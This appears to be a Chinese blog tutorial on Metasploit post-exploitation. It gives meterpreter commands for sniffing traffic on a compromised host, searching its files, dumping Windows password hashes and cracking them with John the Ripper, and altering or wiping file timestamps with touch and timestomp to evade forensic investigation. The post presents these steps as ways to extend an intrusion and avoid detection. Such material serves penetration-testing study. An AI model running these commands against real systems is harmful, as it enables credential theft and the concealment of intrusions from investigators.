美文网首页
抓包,搜索文件,破解弱口令,电子取证

抓包,搜索文件,破解弱口令,电子取证

作者: Instu | 来源:发表于2017-04-08 09:55 被阅读0次

扩大战果——抓包

sniffer插件:

在内存中缓存区块循环存储抓包(50000个包),不写硬盘,因此需要每隔一段时间dump一下。

智能过滤meterpreter流量,传输过程使用ssl/tls加密。

meterpreter > load sniffer

meterpreter > sniffer_interfaces  列出网卡

meterpreter > sniffer_start 2  在网卡2上启动抓包

meterpreter > sniffer_dump 2 1.cap  保存数据包,并命名为1.cap

msf > use auxiliary/sniffer/psnuffle  使用psnuffle模块,提取1.cap数据包中的信息


搜索文件

meterpreter > search -f *.pdf

meterpreter > search -d c:\\program\ files\\ -f *.txt  在program files目录下搜索txt文件(注意“空格和\”转移)


破解弱口令 John the Ripper

msf > use post/windows/gather/hashdump  首先使用该模块,dump目标主机的账号密码,结果会保存在tmp目录下

msf post(hashdump) > use auxiliary/analyze/jtr_crack_fast

msf auxiliary(jtr_crack_fast) > run  然后使用该模块,可以破解常见的弱口令


电子取证

避免被电子取证发现的方法:不要碰文件系统。meterpreter的先天优势所在——完全基于内存。

atime 访问时间(例如cat 1.txt)

mtime 更改时间(例如vim 1.txt)

ctime 改动时间(例如chmod u+x 1.txt)

root@kali:~# ls -l --time=atime 1.txt

root@kali:~# ls -l --time=mtime 1.txt

root@kali:~# stat 1.txt

root@kali:~# touch -d "2 days ago" 1.txt  更改1.txt的atime和mtime

root@kali:~# touch -t 1701010101 1.txt  更改1.txt的atime和mtime

meterpreter下的timestomp

Windows下将ctime翻译成创建时间(create),Linux下将ctime翻译成改动时间(change)

Windows的NTFS文件系统下多了个Entry Modified。

meterpreter > timestomp -v 1.txt  查看1.txt的时间

meterpreter > timestomp -f c:\\autoexec.bat 1.txt  将1.txt的时间改成与autoexec.bat相同

-a,-m,-c,-e

meterpreter > timestomp -z "11/11/2016 11:11:11" 1.txt  或者使用-z将mace时间全部修改

另外还有-b和-r参数,可以将mace时间擦除,目前版本使用有bug。

meterpreter > timestomp -b 1.txt

meterpreter > timestomp -r C:\\Users\\coler\\Desktop\\

相关文章

  • 抓包,搜索文件,破解弱口令,电子取证

    扩大战果——抓包 sniffer插件: 在内存中缓存区块循环存储抓包(50000个包),不写硬盘,因此需要每隔一段...

  • Metasploit爆破Tomcat弱口令

    目的 利用Tomcat弱口令漏洞,破解出登陆密码,获得目标主机会话。 原理 利用枚举的方法破解Tomcat的弱口令...

  • burpsuite弱口令破解

    1、找一个不需要验证登陆的网站,也可以自己搭建环境,先注册一个真的等待进行测试 2、在登陆端口随便输入一个错误的密...

  • Metasploit-SSH爆破

    目的 利用SSH弱口令漏洞,获取目标主机权限 原理 靶机root用户存在弱口令漏洞,利用枚举的方法破解目标主机ss...

  • 网络安全弱口令是什么意思?有什么影响?

    弱口令是网络安全十大安全漏洞之一,所谓的口令其实就是我们的密码,而弱口令就是相对来说比较容易被破解的密码,它会对信...

  • 暴力破解zip文件

    网上搜索过一个压缩包破解程序;要花钱;有的破解版的竟然只能破解顶层压缩的,文件夹里面的文件被压缩就解不出来了;于是...

  • Metasploit实战:SSH漏洞攻击

    SSH弱口令破解 如果在设置SSH服务时,管理员设置了容易被猜解出来的用户名和密码(弱口令)。那么测试人员就可以使...

  • 如何破解root口令

    小编简介:如何破解root口令,及加密口令。和破解加密口令。 一,三步破解root口令 流程:启动系统时,设置其运...

  • 使用 John the Ripper 进行弱口令检测和破解

    John the Ripper 是一款常见的弱口令检测(或者说是破解)的小工具。 一、John the Rippe...

  • Jenkins - Jenkins 修改用户密码

    一般用户都会设置弱密码口令,因为Jenkins可以执行远程命令,如果被破解了所口令可能会导致黑客登录服务器而进行相...

网友评论

      本文标题:抓包,搜索文件,破解弱口令,电子取证

      本文链接:https://www.haomeiwen.com/subject/vbqlattx.html